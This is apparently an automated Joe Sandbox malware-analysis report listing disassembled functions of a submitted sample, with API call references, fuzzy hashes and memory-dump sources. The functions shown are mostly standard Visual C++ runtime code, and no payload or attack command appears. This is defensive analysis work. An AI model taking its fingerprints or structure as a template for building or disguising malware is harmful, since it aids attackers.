                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$DirectoryState$CommCompressedConsoleCreateFoldInputPowerRemoveReplaceSizeStringSystemWindowsWrite
                                                                                          • String ID:
                                                                                          • API String ID: 1778575968-0
                                                                                          • Opcode ID: 4f6f39edf005aeda46af50a8d518a755cc1789faee46958ee84425fef034561a
                                                                                          • Instruction ID: 4ee983ede31843d0677571ecc916d42194daf4686eb8a74a58ff005235dbce6b
                                                                                          • Opcode Fuzzy Hash: 4f6f39edf005aeda46af50a8d518a755cc1789faee46958ee84425fef034561a
                                                                                          • Instruction Fuzzy Hash: 98114835248381FFF3509B90DD4AFA97764BB48B02F50452DF3C9AA5E1D6B45484CB2A
                                                                                          Function 00405FD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00405FF0
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00406016
                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040609A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 004060A9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004060BE
                                                                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 004060D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                          • String ID: bad cast
                                                                                          • API String ID: 2427920155-3145022300
                                                                                          • Opcode ID: 2f85457529f0a299cb2ba089f9c46beda69e4d9d9e2ea0c3dfd25dd9dcffc868
                                                                                          • Instruction ID: 4d3893fe6a5c30eef50f402383afd780c5eaa7b892cf66508f73834e293ec009
                                                                                          • Opcode Fuzzy Hash: 2f85457529f0a299cb2ba089f9c46beda69e4d9d9e2ea0c3dfd25dd9dcffc868
                                                                                          • Instruction Fuzzy Hash: AB31F0706443018FC724EF15C881B5A77E0EB10324F56863EE4A7772E1DB38A895CB9A
                                                                                          Function 0040A69D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00428828,00000008,0040A7A5,00000000,00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A6AE
                                                                                          • __lock.LIBCMT ref: 0040A6E2
                                                                                            • Part of subcall function 0040B8DE: __mtinitlocknum.LIBCMT ref: 0040B8F4
                                                                                            • Part of subcall function 0040B8DE: __amsg_exit.LIBCMT ref: 0040B900
                                                                                            • Part of subcall function 0040B8DE: EnterCriticalSection.KERNEL32(00000000,00000000,?,0040A6E7,0000000D), ref: 0040B908
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 0040A6EF
                                                                                          • __lock.LIBCMT ref: 0040A703
                                                                                          • ___addlocaleref.LIBCMT ref: 0040A721
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                          • String ID: KERNEL32.DLL$LwP<Mw`Lw
                                                                                          • API String ID: 637971194-2887460716
                                                                                          • Opcode ID: de087aec9d934676807015c443d5866b82b43fcc768da9d2f79c2e01d7bdb0c6
                                                                                          • Instruction ID: 50e25b481ea5cafad60f57b810cc0dba0d2538eb25abbed6797350047c624630
                                                                                          • Opcode Fuzzy Hash: de087aec9d934676807015c443d5866b82b43fcc768da9d2f79c2e01d7bdb0c6
                                                                                          • Instruction Fuzzy Hash: 4501A171440700DBD720AF66D906709FBF0EF50315F20852FE895A76E0CBB8A544CB5E
                                                                                          Function 004092D0 Relevance: 12.1, APIs: 8, Instructions: 147COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?), ref: 0040936B
                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 004093A4
                                                                                          • __freea.LIBCMT ref: 0040943C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$__freea
                                                                                          • String ID:
                                                                                          • API String ID: 172395558-0
                                                                                          • Opcode ID: a9c929b235f93f46a49c6e35ea80cc13d2fa22439db03f388dccc7363f527298
                                                                                          • Instruction ID: cc443e5145269d73018cddfaaf90ae8c1dbef481df038db2ea501d94d0459fb4
                                                                                          • Opcode Fuzzy Hash: a9c929b235f93f46a49c6e35ea80cc13d2fa22439db03f388dccc7363f527298
                                                                                          • Instruction Fuzzy Hash: AF415E7290410AFBDF019F91CC818AE7B76EB88354F54847BF914B61A2C7398D629F58
                                                                                          Function 004078E3 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(00000001,00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 004078F8
                                                                                          • DecodePointer.KERNEL32(?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 00407905
                                                                                          • __realloc_crt.LIBCMT ref: 00407942
                                                                                          • __realloc_crt.LIBCMT ref: 00407958
                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 0040796A
                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 0040797E
                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,000000FF,?,0040B905,00000011,00000000,?,0040A6E7,0000000D), ref: 00407986
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                          • String ID:
                                                                                          • API String ID: 4108716018-0
                                                                                          • Opcode ID: 16dd7e7df1c3487b6bcbbad794b2dafa116b3c013bda22862baffe7fd9668bef
                                                                                          • Instruction ID: 3b940898ccd266a2d8bf858ff7e1816e62fa3607815d32cdb693c61a23b8cc4f
                                                                                          • Opcode Fuzzy Hash: 16dd7e7df1c3487b6bcbbad794b2dafa116b3c013bda22862baffe7fd9668bef
                                                                                          • Instruction Fuzzy Hash: CD11D672A04215AFEB109F29ED80D9A7BDAEB45320310453BE405F72A1EB79FC408B88
                                                                                          Function 004085A5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd_noexit.LIBCMT ref: 004085AC
                                                                                            • Part of subcall function 0040A751: GetLastError.KERNEL32(?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A755
                                                                                            • Part of subcall function 0040A751: ___set_flsgetvalue.LIBCMT ref: 0040A763
                                                                                            • Part of subcall function 0040A751: __calloc_crt.LIBCMT ref: 0040A777
                                                                                            • Part of subcall function 0040A751: DecodePointer.KERNEL32(00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A791
                                                                                            • Part of subcall function 0040A751: GetCurrentThreadId.KERNEL32 ref: 0040A7A7
                                                                                            • Part of subcall function 0040A751: SetLastError.KERNEL32(00000000,?,?,0040ACEB,00407454,?,?,00407335,?), ref: 0040A7BF
                                                                                          • __calloc_crt.LIBCMT ref: 004085CE
                                                                                          • __get_sys_err_msg.LIBCMT ref: 004085EC
                                                                                          • _strcpy_s.LIBCMT ref: 004085F4
                                                                                          • __invoke_watson.LIBCMT ref: 00408609
                                                                                          Strings
                                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004085B9, 004085DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                          • API String ID: 3117964792-798102604
                                                                                          • Opcode ID: 5b9437e124df2a9f9cccf629ee88ae42165214273238358d56f680335241dea1
                                                                                          • Instruction ID: f0c7397406b5bf017591f2fa3c0236cd0798a78000f9480ad363abfec1e6c413
                                                                                          • Opcode Fuzzy Hash: 5b9437e124df2a9f9cccf629ee88ae42165214273238358d56f680335241dea1
                                                                                          • Instruction Fuzzy Hash: 93F024726043143BDB253A2A5E8196B729C8B6076CB11453FF689B72D1EE3DCD4082AE
                                                                                          Function 00404B70 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00404B93
                                                                                          • std::exception::exception.LIBCMT ref: 00404BCE
                                                                                            • Part of subcall function 00407340: std::exception::_Copy_str.LIBCMT ref: 0040735B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00404BE5
                                                                                            • Part of subcall function 004080C1: RaiseException.KERNEL32(00000004,?,?,>@), ref: 00408103
                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404BEC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                                                          • String ID: PK@$bad locale name
                                                                                          • API String ID: 73090415-3645230704
                                                                                          • Opcode ID: cc1387ebdadb7268b5fba507bbcc00dbba370bd00de3eb0b1a7c68e4c4aa6c23
                                                                                          • Instruction ID: da9e5ed7a18f1a670e15eaa26a13f12b073dbedc47fc89f59813c6b0ef5b5f7c
                                                                                          • Opcode Fuzzy Hash: cc1387ebdadb7268b5fba507bbcc00dbba370bd00de3eb0b1a7c68e4c4aa6c23
                                                                                          • Instruction Fuzzy Hash: 311186B15097809FC310DF1A8481A4BFFE4BB58714F808A6FF1D963681C738A608CB6A
                                                                                          Function 00407A84 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 00407A9E
                                                                                            • Part of subcall function 00407564: __FF_MSGBANNER.LIBCMT ref: 0040757D
                                                                                            • Part of subcall function 00407564: __NMSG_WRITE.LIBCMT ref: 00407584
                                                                                            • Part of subcall function 00407564: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004099C8,00000000,00000001,00000000,?,0040B869,00000018,00428878,0000000C,0040B8F9), ref: 004075A9
                                                                                          • std::exception::exception.LIBCMT ref: 00407AD3
                                                                                          • std::exception::exception.LIBCMT ref: 00407AED
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00407AFE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                          • String ID: K@$bad allocation
                                                                                          • API String ID: 1414122017-1384542263
                                                                                          • Opcode ID: 65de17107ea0a47686f892a3af2d3f24cef5a89699381e8d192bff2aeaafe991
                                                                                          • Instruction ID: 1939afae9243ad08d1e2e4bd9083f1f83463ba83aa0ae8e6705c1db59e0ff189
                                                                                          • Opcode Fuzzy Hash: 65de17107ea0a47686f892a3af2d3f24cef5a89699381e8d192bff2aeaafe991
                                                                                          • Instruction Fuzzy Hash: 91F0F970F082196ADB54EB52DC01A9E37A89B40748F54407FF804B71E1DB7CAB85CB9E
                                                                                          Function 0040C6AC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0040C6CD
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040C6DE
                                                                                          • __getptd.LIBCMT ref: 0040C6EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                          • String ID: MOC$RCC$csm
                                                                                          • API String ID: 803148776-2671469338
                                                                                          • Opcode ID: f4355893555f86aa4f266521807de2b4abd94cef2b83460923fe1a8fc58e9016
                                                                                          • Instruction ID: f05a84b7e226a0ce95e0330a2d99a0a882557fb88b877ce563c557ec77daf802
                                                                                          • Opcode Fuzzy Hash: f4355893555f86aa4f266521807de2b4abd94cef2b83460923fe1a8fc58e9016
                                                                                          • Instruction Fuzzy Hash: 16E09230110208CFC7309774C08A76932A1EB48709F1559B7E50CEB3A3C73ED890AA5B
                                                                                          Function 0040C95E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CreateFrameInfo.LIBCMT ref: 0040C986
                                                                                            • Part of subcall function 004083EC: __getptd.LIBCMT ref: 004083FA
                                                                                            • Part of subcall function 004083EC: __getptd.LIBCMT ref: 00408408
                                                                                          • __getptd.LIBCMT ref: 0040C990
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040C99E
                                                                                          • __getptd.LIBCMT ref: 0040C9AC
                                                                                          • __getptd.LIBCMT ref: 0040C9B7
                                                                                          • _CallCatchBlock2.LIBCMT ref: 0040C9DD
                                                                                            • Part of subcall function 00408491: __CallSettingFrame@12.LIBCMT ref: 004084DD
                                                                                            • Part of subcall function 0040CA84: __getptd.LIBCMT ref: 0040CA93
                                                                                            • Part of subcall function 0040CA84: __getptd.LIBCMT ref: 0040CAA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1602911419-0
                                                                                          • Opcode ID: ea18aaa508b914f453c6c944b34dbab755f83e4c71c447c13bc04cebec951207
                                                                                          • Instruction ID: 6ffba10e2211504aed184b9c0c0023e470d4c600684c076955474923db7f4312
                                                                                          • Opcode Fuzzy Hash: ea18aaa508b914f453c6c944b34dbab755f83e4c71c447c13bc04cebec951207
                                                                                          • Instruction Fuzzy Hash: 6711E4B1D10309DFDB00EFA5C545BAEBBB1FB08319F10846EE854A7291DB389A119F59
                                                                                          Function 00407CA5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecodePointer__call_reportfault_raise
                                                                                          • String ID: PNfw
                                                                                          • API String ID: 2042925533-1837848778
                                                                                          • Opcode ID: 504db6a2d7f41632d352348e1aa51638ec00ea8521389a229b2be467b8d14729
                                                                                          • Instruction ID: 58946ac6583beb0d35b8e319fd5c8e34357b9acd4ee0e7bc28078f45c67ecff3
                                                                                          • Opcode Fuzzy Hash: 504db6a2d7f41632d352348e1aa51638ec00ea8521389a229b2be467b8d14729
                                                                                          • Instruction Fuzzy Hash: C4E01A60B9828A2AF52173A26C1BB6A11044F94B1DF48403F7A04781C3EAFD9951986F
                                                                                          Function 004108D6 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 004108E4
                                                                                            • Part of subcall function 00407564: __FF_MSGBANNER.LIBCMT ref: 0040757D
                                                                                            • Part of subcall function 00407564: __NMSG_WRITE.LIBCMT ref: 00407584
                                                                                            • Part of subcall function 00407564: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004099C8,00000000,00000001,00000000,?,0040B869,00000018,00428878,0000000C,0040B8F9), ref: 004075A9
                                                                                          • _free.LIBCMT ref: 004108F7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocHeap_free_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 2734353464-0
                                                                                          • Opcode ID: 1d467cc9796b85702f855dfb741102c0bc3f11cbc9ceba9a698d9b54ddedfc86
                                                                                          • Instruction ID: a64f68f23a471c120e4eb65213a4073683392ff39e647aa3c33ff3e4c235adda
                                                                                          • Opcode Fuzzy Hash: 1d467cc9796b85702f855dfb741102c0bc3f11cbc9ceba9a698d9b54ddedfc86
                                                                                          • Instruction Fuzzy Hash: 5811EE72518314ABEB213B36DD056DA36549F54374B11443BF448BB291DE7CC8D1C69D
                                                                                          Function 00404C10 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404C34
                                                                                            • Part of subcall function 00406806: _setlocale.LIBCMT ref: 00406818
                                                                                          • _free.LIBCMT ref: 00404C46
                                                                                            • Part of subcall function 0040742E: HeapFree.KERNEL32(00000000,00000000,?,00407335,?), ref: 00407444
                                                                                            • Part of subcall function 0040742E: GetLastError.KERNEL32(?,?,00407335,?), ref: 00407456
                                                                                          • _free.LIBCMT ref: 00404C59
                                                                                          • _free.LIBCMT ref: 00404C6C
                                                                                          • _free.LIBCMT ref: 00404C7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3515823920-0
                                                                                          • Opcode ID: c01ccd7e261bf989ae20c12783c60eba2bcf3e9505bdbc989f39c871c672c71b
                                                                                          • Instruction ID: 0e9e8e0449015c2dbe50d0821f89499f3dca126092a33e8d9313b78239884f77
                                                                                          • Opcode Fuzzy Hash: c01ccd7e261bf989ae20c12783c60eba2bcf3e9505bdbc989f39c871c672c71b
                                                                                          • Instruction Fuzzy Hash: 4C01E5F1905B409BD620DF19D945A17F7E9AF80B10F144A3FF156E3B80E338E8148A57
                                                                                          Function 0040A5A1 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0040A5AD
                                                                                            • Part of subcall function 0040A7CA: __getptd_noexit.LIBCMT ref: 0040A7CD
                                                                                            • Part of subcall function 0040A7CA: __amsg_exit.LIBCMT ref: 0040A7DA
                                                                                          • __getptd.LIBCMT ref: 0040A5C4
                                                                                          • __amsg_exit.LIBCMT ref: 0040A5D2
                                                                                          • __lock.LIBCMT ref: 0040A5E2
                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0040A5F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
